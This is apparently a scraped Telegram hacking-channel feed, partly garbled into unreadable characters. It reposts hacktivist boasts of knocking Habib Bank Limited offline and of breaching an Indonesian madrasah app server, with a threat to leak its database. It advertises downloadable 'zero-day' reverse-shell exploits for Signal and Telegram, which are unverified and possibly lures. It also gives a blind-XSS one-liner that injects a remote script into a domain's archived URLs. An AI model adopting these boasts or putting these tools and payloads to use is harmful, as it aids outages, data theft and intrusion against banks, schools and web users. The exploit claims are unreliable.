Forwarded from Kerala Cyber Xtractors
HBL (Habib Bank Limited) THE LARGEST BANK IN PAKISTAN IS DOWN FOR MORE THAN 1 HOUR (MAYBE MORE THAN ONE HOUR)
https://check-host.net/check-report/fbe5c26k2bb
https://check-host.net/check-report/fbe5d5dk58b
https://check-host.net/check-report/fbe6714ka9f
https://check-host.net/check-report/fbe6978k604
https://check-host.net/check-report/fbe6a0akdd8
https://check-host.net/check-report/fbe6da0kfb
https://check-host.net/check-report/fbe6ec6k1a7
https://check-host.net/check-report/fbe704bk643
https://check-host.net/check-report/fbe7368kae7
https://check-host.net/check-report/fbe7368kae7
https://check-host.net/check-report/fbe84abkb28
#KCX
#KERALA_CYBER_XTRACTORS
FEEL THE POWER OF INDIAN HACKERS
Greetz to :-
#TEAM_ANON_101
#IndianCyberForce
#DarknetAssociation
#KeralaCyberXtractors
#NewWorldHacktivist
#IndianCyberMafia
#BlackDragonSecurity
#IndianCyberTroops
#AnonymousIndia
#IndianCyberPwnage
#UnknownCyberCult
#ERR0RxCYBER_FORCE
#1-4-1
#UnitedIndianHackers
#UnitedByOneDividedByZero
https://check-host.net/check-report/fbe5c26k2bb
https://check-host.net/check-report/fbe5d5dk58b
https://check-host.net/check-report/fbe6714ka9f
https://check-host.net/check-report/fbe6978k604
https://check-host.net/check-report/fbe6a0akdd8
https://check-host.net/check-report/fbe6da0kfb
https://check-host.net/check-report/fbe6ec6k1a7
https://check-host.net/check-report/fbe704bk643
https://check-host.net/check-report/fbe7368kae7
https://check-host.net/check-report/fbe7368kae7
https://check-host.net/check-report/fbe84abkb28
#KCX
#KERALA_CYBER_XTRACTORS
FEEL THE POWER OF INDIAN HACKERS
Greetz to :-
#TEAM_ANON_101
#IndianCyberForce
#DarknetAssociation
#KeralaCyberXtractors
#NewWorldHacktivist
#IndianCyberMafia
#BlackDragonSecurity
#IndianCyberTroops
#AnonymousIndia
#IndianCyberPwnage
#UnknownCyberCult
#ERR0RxCYBER_FORCE
#1-4-1
#UnitedIndianHackers
#UnitedByOneDividedByZero
Forwarded from CYBER DEMONS (INDIA๐ฎ๐ณ) ๐คCHANNEL๐ค (แดดแดฌแถแดทแดธแดผแถแดท)
A Beginnerโs Guide to Ethical Hacking and Bug Hunting
READ FULL BLOG ๐๐
https://cyberdemonsindia.42web.io/2023/04/28/a-beginners-guide-to-ethical-hacking-and-bug-hunting/
แดแดษชษด แดสแด สแดแดษขแดแด แด๊ฐ แดสสแดส แด แด๊ฐแดษดแด แดส๊ฑ แดษดแด สแดแดแดแดแด แดษด แดแดสษชแดแดส สแดแดแดแดส แดษดแด สแดษข สแดษดแดแดส แดกษชแดส แดแดส แดแดแดแดสแดสแดษด๊ฑษชแด แด สแดษขษชษดษดแดสโ๊ฑ ษขแดษชแด แด. แดษดสแดแดแด แดสแด ๊ฑแดแดสแดแด๊ฑ แด๊ฐ แดแดสษชแดแดส สแดแดแดษชษดษข แดษดแด สแดษข สแดษดแดษชษดษข แดษดแด แดแดแดแด สแดแดส แดแดสแด ษชษด แดสแด แดแด แดส-แดแด แดสแด ษชษดษข แดกแดสสแด แด๊ฐ แดสสแดส๊ฑแดแดแดสษชแดส. สแดแดโ๊ฑ แด ษชแด แด ษชษด แดษดแด ๊ฑแดแดสแด สแดแดส แดแดแดสษดแดส แดแดแด แดส!
READ FULL BLOG ๐๐
https://cyberdemonsindia.42web.io/2023/04/28/a-beginners-guide-to-ethical-hacking-and-bug-hunting/
แดแดษชษด แดสแด สแดแดษขแดแด แด๊ฐ แดสสแดส แด แด๊ฐแดษดแด แดส๊ฑ แดษดแด สแดแดแดแดแด แดษด แดแดสษชแดแดส สแดแดแดแดส แดษดแด สแดษข สแดษดแดแดส แดกษชแดส แดแดส แดแดแดแดสแดสแดษด๊ฑษชแด แด สแดษขษชษดษดแดสโ๊ฑ ษขแดษชแด แด. แดษดสแดแดแด แดสแด ๊ฑแดแดสแดแด๊ฑ แด๊ฐ แดแดสษชแดแดส สแดแดแดษชษดษข แดษดแด สแดษข สแดษดแดษชษดษข แดษดแด แดแดแดแด สแดแดส แดแดสแด ษชษด แดสแด แดแด แดส-แดแด แดสแด ษชษดษข แดกแดสสแด แด๊ฐ แดสสแดส๊ฑแดแดแดสษชแดส. สแดแดโ๊ฑ แด ษชแด แด ษชษด แดษดแด ๊ฑแดแดสแด สแดแดส แดแดแดสษดแดส แดแดแด แดส!
Forwarded from Tสษชแดแดส Pแดษดษขแดษชษด ( trickypenguin.ink )
Google Dorking for Penetration Testers
What is Google Dorking?
Dorking, also known as Google Dorking, is a technique used by hackers and penetration testers to search for sensitive information...
Read More
bit.ly/3oYWPxT
@trickypenguin
What is Google Dorking?
Dorking, also known as Google Dorking, is a technique used by hackers and penetration testers to search for sensitive information...
Read More
bit.ly/3oYWPxT
@trickypenguin
๐3
WebSocket Pentration Testing
HTML5 has introduced many new powerful APIs, one of the more interesting components being websockets. These highlight a trend in web application development to remove or reduce the overhead of HTTP.Read : https://system32.ink/websocket-pentration-testing/
๐3
Forwarded from BlackDragonSec ๐ฎ๐ณ
INDONESIANA MADRASAH APPLICATION SERVER HACKED
Play Store Link :
https://play.google.com/store/apps/details?id=id.hdmadrasah.rdm
App Store Link :
https://apps.apple.com/us/app/rdm-rapor-digital-madrasah/id1604487156
Database will be leaked Soon
#BlackDragonSec
#OpsPayBack
Greetz To All Indian Hackers
Play Store Link :
https://play.google.com/store/apps/details?id=id.hdmadrasah.rdm
App Store Link :
https://apps.apple.com/us/app/rdm-rapor-digital-madrasah/id1604487156
Database will be leaked Soon
#BlackDragonSec
#OpsPayBack
Greetz To All Indian Hackers
โค3
How To Recover Deleted Data From Pendrive And HardDisk
@crackcodes
When a file is deleted, the meta-information about this file (file name, date/time, size, location of the first data block/cluster, etc.) is lost; for example, in an ext3/ext4 file system, the names of deleted files are still present, but the location of the first data block is removed. This means the data is still present on the file system, but only until some or all of it is overwritten by new file data.
Read Article: https://bit.ly/Recover_data@crackcodes
๐ 5 ANIME BASED ON HACKING ๐
There are several anime series and movies that feature hacking as a central theme. Here we have listed 5 best animes for you.
With these anime, you will not only enjoy but also increase your knowledge of hacking & programming.
โ Link : bit.ly/AnimeOnHacking
Share & Support โค๏ธ
There are several anime series and movies that feature hacking as a central theme. Here we have listed 5 best animes for you.
With these anime, you will not only enjoy but also increase your knowledge of hacking & programming.
โ Link : bit.ly/AnimeOnHacking
Share & Support โค๏ธ
๐ผ๐ช๐ฉ๐๐๐ฃ๐ฉ๐๐๐๐ฉ๐๐ค๐ฃ ๐ซ๐จ ๐ผ๐ช๐ฉ๐๐ค๐ง๐๐ฏ๐๐ฉ๐๐ค๐ฃ
๐๐๐ฃ๐ : https://youtube.com/shorts/RFFDrICrAXc?feature=๐จ๐๐๐ง๐
๐๐ช๐๐จ๐๐ง๐๐๐ ๐ฉ๐ค ๐ค๐ช๐ง ๐๐ค๐ช๐๐ช๐๐ ๐๐๐๐ฃ๐ฃ๐๐ก ๐๐ค๐ง ๐ข๐ค๐ง๐ ๐ช๐ฅ๐๐ค๐ข๐๐ฃ๐ ๐พ๐ฎ๐๐๐ง ๐๐๐๐ช๐ง๐๐ฉ๐ฎ ๐๐๐๐๐ค๐จ ๐
๐๐๐ฃ๐ : https://youtube.com/shorts/RFFDrICrAXc?feature=๐จ๐๐๐ง๐
๐๐ช๐๐จ๐๐ง๐๐๐ ๐ฉ๐ค ๐ค๐ช๐ง ๐๐ค๐ช๐๐ช๐๐ ๐๐๐๐ฃ๐ฃ๐๐ก ๐๐ค๐ง ๐ข๐ค๐ง๐ ๐ช๐ฅ๐๐ค๐ข๐๐ฃ๐ ๐พ๐ฎ๐๐๐ง ๐๐๐๐ช๐ง๐๐ฉ๐ฎ ๐๐๐๐๐ค๐จ ๐
YouTube
Authentication VS Authorization
Authentication is the process of verifying the identity of a user, device, or system, while authorization is the process of granting or denying access to spe...
New Blog is Out Check Here ๐
https://www.cybersecuritymumbai.com/protect-your-mobile-from-hackers/
https://www.cybersecuritymumbai.com/protect-your-mobile-from-hackers/
Signal-zeroday-exploit
Signal RCE vulnerability found in contact exchange API
Usage:
Signal RCE vulnerability found in contact exchange API
Usage:
python poc.py -t [TARGET PHONE #] -i [IP HERE] -p [PORT HERE]Download: https://system32.ink/news-feed/p/333/
Telegram-0day-exploit-poc
Zero Day revshell exploit tool for Remote Code Execution vulnerability found in Telegram's bot api broadcast_msg api call.
Usage:
Zero Day revshell exploit tool for Remote Code Execution vulnerability found in Telegram's bot api broadcast_msg api call.
Usage:
python poc.py -u [TELEGRAM USER] -i [IP HERE] -p [PORT HERE]
Download: https://system32.ink/news-feed/p/334/Install and Use Intrusion detection system Snort
https://techofide.com/blogs/snort-intrusion-detection-system-prevention-system-installation-use-in-linux/
Join our group for more cyber security content
t.me/ethicalhackingtechofide
https://techofide.com/blogs/snort-intrusion-detection-system-prevention-system-installation-use-in-linux/
Join our group for more cyber security content
t.me/ethicalhackingtechofide
DNSRecon
Dnsrecon is one of the popular scripts in the security community which is used for reconnaissance on domains. This script is written in python language.
This script checks all the DNS records for AXFR which can be useful for a security researcher for DNS enumeration on all types of records such as SOA, NS, TXT, SVR, SPF, etc.
Dnsrecon is one of the popular scripts in the security community which is used for reconnaissance on domains. This script is written in python language.
This script checks all the DNS records for AXFR which can be useful for a security researcher for DNS enumeration on all types of records such as SOA, NS, TXT, SVR, SPF, etc.
Forwarded from d.
๐๐๐จ๐จ ๐๐ช๐ฃ๐ฉ๐๐ฃ๐ ๐ฝ๐ก๐๐ฃ๐ ๐๐๐.
๐๐๐ฃ๐ : https://twitter.com/thecybertix/status/1654025276123406337?t=L9suAy2ju68fLaCOFPiOjg&s=19
๐๐๐ฃ๐ : https://twitter.com/thecybertix/status/1654025276123406337?t=L9suAy2ju68fLaCOFPiOjg&s=19
X (formerly Twitter)
Cybertix (@thecybertix) on X
๐ฝ๐ก๐๐ฃ๐ ๐๐๐ ๐๐๐จ๐จ ๐๐ช๐ฃ๐ฉ๐๐ฃ๐
cat domain.txt | waybackurls | httpx -H "User-Agent: \"><script src=https://t.co/XNpH7dI1eE></script>"
๐๐ช๐๐จ๐๐ง๐๐๐ ๐ฉ๐ค ๐ค๐ช๐ง ๐๐ค๐ช๐๐ช๐๐ ๐พ๐๐๐ฃ๐ฃ๐๐ก:
https://t.co/xXKr0Ma4jZ
#bugbountytips #hacks #bugbounties #security
cat domain.txt | waybackurls | httpx -H "User-Agent: \"><script src=https://t.co/XNpH7dI1eE></script>"
๐๐ช๐๐จ๐๐ง๐๐๐ ๐ฉ๐ค ๐ค๐ช๐ง ๐๐ค๐ช๐๐ช๐๐ ๐พ๐๐๐ฃ๐ฃ๐๐ก:
https://t.co/xXKr0Ma4jZ
#bugbountytips #hacks #bugbounties #security
๐2